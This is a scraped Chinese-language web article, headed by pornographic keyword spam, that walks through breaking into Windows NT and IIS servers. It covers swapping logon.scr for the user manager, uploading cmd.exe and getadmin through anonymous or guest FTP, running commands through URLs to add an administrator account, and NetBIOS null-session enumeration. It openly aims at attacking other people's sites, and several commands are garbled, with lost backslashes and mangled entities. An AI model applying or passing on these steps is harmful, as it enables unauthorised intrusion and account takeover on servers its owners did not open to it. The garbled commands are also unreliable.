中文国产日韩欧美视频,午夜精品999,色综合天天综合网国产成人网,色综合视频一区二区观看,国产高清在线精品,伊人色播,色综合久久天天综合观看

即便是Administrastor賬戶也不安全 -電腦資料

電腦資料 時間:2019-01-01 我要投稿
【www.szmdbiao.com - 電腦資料】

    導(dǎo)讀:動,

即便是Administrastor賬戶也不安全

。 logon.scr是啟動時加載的程序,重新啟動后,不會出現(xiàn)以往的登陸密碼輸入界面,而是用戶管理器。 這時他就有權(quán)限把自己加到Administrator組,不要忘記把文件名改回來啊! 之二: 下面的技術(shù)適用于不重視NT網(wǎng)絡(luò)安全的網(wǎng)站, 一些 http的技術(shù)也可以供較...

正文:

    如果你有普通用戶帳號,有個一個很簡單的方法獲取NT Administrator帳號:

    之一: 先把c:winntsystem32下的logon.scr改名為logon.old備份,然后把usrmgr.exe改名為logon.scr,然后重新啟動。

    logon.scr是啟動時加載的程序,重新啟動后,不會出現(xiàn)以往的登陸密碼輸入界面,而是用戶管理器。

    這時他就有權(quán)限把自己加到Administrator組,不要忘記把文件名改回來啊!

    之二:

    下面的技術(shù)適用于不重視NT網(wǎng)絡(luò)安全的網(wǎng)站, 一些 http的技術(shù)也可以供較高級的人員參考。進入NT網(wǎng)絡(luò)可以采取下面的步驟:

    因為nt的iis server的ftp一般都是允許anonymous匿名帳號進入的,有些anonymous的帳號還有upload權(quán)限,我們就要攻擊這類站點。因為如果不允許匿名帳號,就可能造成明文密碼在網(wǎng)上傳輸。用tcpspy的工具可以截獲這些密碼。現(xiàn)在不談這些比較高級的技術(shù)。

    正因為允許匿名帳號ftp登陸的設(shè)定,也給我們帶來了突破nt server的機會。我們用ftp登陸一個nt server,比如:www.xxx.com(示例名):

   

<ccid_code />ftp www.xxx.com connected to www.xxx.com</ccid_code />
    ntsvr2這個東西暴露了其netbios名,那么在iis的背景下,必然會有一個iuser_ntsvr2的用戶帳號,屬于domain user組,這個帳號我們以后要用來獲取administrator的權(quán)限。

   

<ccid_code />user (www.xxx.comnone)):anonymous password: 輸入 guest@ 或者guest</ccid_code />
    對于缺乏網(wǎng)絡(luò)安全知識的管理員來說,很多人沒有將guest帳號禁止,或者沒有設(shè)置密碼。那么guest帳號就是一個可用的正確的用戶帳號,雖然只屬于domain guest組。

    在這種情況下我們就可以進nt server的ftp了。

    進去以后,看看目錄列表,試試 cd /c 或wwwroot等關(guān)鍵目錄,如果運氣好,改變目錄成功,這時你就有了80%的把握。

    現(xiàn)在,開始查找cgi-bin目錄(或者scripts目錄)。進去以后,把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll傳上去到cgi-bin。

    然后輸入:http://www.xxx.com/cgi-bin/getadmin.exe?iusr_saturn

    大約十多秒后屏幕顯示:

   

<ccid_code />cgi error</ccid_code />
    這時有90%的可能是:你已經(jīng)把iuser_ntsvr2升級為administrator,也就是任何訪問該web站的人都是管理員,

電腦資料

即便是Administrastor賬戶也不安全》(http://www.szmdbiao.com)。

    下面可以add user:

   

<ccid_code />http://www.xxx.com/cgi-bin/cmd.exe?/c c:winntsystem32net.exe user china news /add</ccid_code />
    這樣就創(chuàng)建了一個叫china用戶,密碼是news,然后:

   

<ccid_code />http://www.xxx.com/cgi-bin/getadmin.exe?china</ccid_code />
    或者

   

<ccid_code />http://www.xxx.com/scripts/tools/getadmin.exe?china</ccid_code />
    你再用china的帳號登陸,就可以有最大的權(quán)限了,也可以用上面的cmd.exe的方法直接修改如果沒有cmd.exe,也可以自己傳一個上去到scripts/tools或者cgi-bin目錄。

    之三:

    用nt的netbios技術(shù)掃描

   

<ccid_code />nbtstat -a http://www.xxx.com/</ccid_code />
    或者,

   

<ccid_code />nbtstat -a http://www.xxx.com/</ccid_code />
    這樣可以得到其域的共享資源名稱;

   

<ccid_code />net view file:/www.xxx.com/</ccid_code />
    可以獲得其機器的共享資源名稱,如果有c盤,

   

<ccid_code />net use f: file:/www.xxx.com/c</ccid_code />
    可以用f:映射其c盤,

   

<ccid_code />net use $">/111.111.111.111ipc$content$nbsp;"quot;"quot; /user:"quot;"quot;</ccid_code />
    之四: unix下移植過來的工具:

    windows95和98的用戶可以用這個tcp/ip工具去抓tcp/ip連接中的包:windump95.exe 使用前還要下載這個庫 packet95.exe。

    windowsnt用戶的版本,windump.exe packetnt.exe

最新文章